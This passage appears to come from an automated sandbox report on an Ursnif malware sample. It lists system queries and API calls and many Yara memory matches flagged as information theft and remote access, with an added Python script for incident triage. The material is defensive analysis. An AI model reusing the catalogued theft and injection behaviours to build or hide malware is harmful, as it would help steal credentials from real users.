Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EA303 cpuid 0_2_013EA303
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102E521 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0102E521
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E5C7F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_013E5C7F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E4638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 0_2_013E4638
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EA303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_013EA303

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
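The Yara hits above fall into two kinds of line: memory dump names of the form <process index>.<dump>.<sequence>.<base address>.<flags>.<flags>.sdmp, and "Process Memory Space" lines naming the host image and PID. For incident scoping, the useful output is the set of host processes to terminate and the distinct memory regions per process to acquire. The following is an added example, not part of the sandbox report, that extracts both. It assumes (not confirmed by the report) that the first dotted field is the sandbox's process index and the fourth the region's base address; the remaining fields are kept unparsed. The sample lines are a subset quoted from the report; the list of Windows binaries treated as injection hosts is an assumption.

```python
import re
from collections import defaultdict

# Subset of the Yara match lines quoted from the report above (constructed selection).
REPORT_LINES = [
    "Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR",
    "Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR",
]

# Assumed layout of a dump name: <process index>.<dump id>.<sequence>.<base address>.<flags>.<flags>
SDMP = re.compile(
    r"File source: (?P<pidx>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp, type: MEMORY$"
)
MEMSTR = re.compile(r"Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+), type: MEMORYSTR$")

# Signed Windows binaries commonly used as hosts for injected code (assumed list, not exhaustive).
LOLBIN_HOSTS = {"rundll32.exe", "regsvr32.exe", "control.exe", "loaddll32.exe", "explorer.exe", "svchost.exe"}


def injected_hosts(lines):
    """Map PID -> image name for every process whose memory matched the rule."""
    hosts = {}
    for line in lines:
        m = MEMSTR.search(line)
        if m:
            hosts[int(m.group("pid"))] = m.group("image")
    return hosts


def regions_by_process(lines):
    """Group matched dump regions by process index: {index: {base_address, ...}}.

    Repeated dumps of the same region (several sequence numbers, or dump ids 2 and 3
    for the same base) collapse into one entry, which is what an acquisition list needs.
    """
    regions = defaultdict(set)
    for line in lines:
        m = SDMP.search(line)
        if m:
            regions[int(m.group("pidx"), 16)].add(int(m.group("base"), 16))
    return dict(regions)


def triage_summary(lines):
    """Scoping summary: hosts to terminate, which of them are LOLBins, and regions to acquire."""
    hosts = injected_hosts(lines)
    return {
        "hosts": hosts,
        "lolbin_hosts": sorted({img for img in hosts.values() if img.lower() in LOLBIN_HOSTS}),
        "regions": regions_by_process(lines),
    }


if __name__ == "__main__":
    summary = triage_summary(REPORT_LINES)
    for pid, image in sorted(summary["hosts"].items()):
        print(f"terminate {image} (PID {pid})")
    for idx, bases in sorted(summary["regions"].items()):
        print(f"process index {idx:#x}: dump " + ", ".join(f"{b:#x}" for b in sorted(bases)))
```

Every host named here is a signed Windows binary (loaddll32.exe is the sandbox's own loader), so image-based allow-listing would miss all of them; the PID list plus the per-process region list is what a responder needs to dump and kill the right things on a live host.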

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR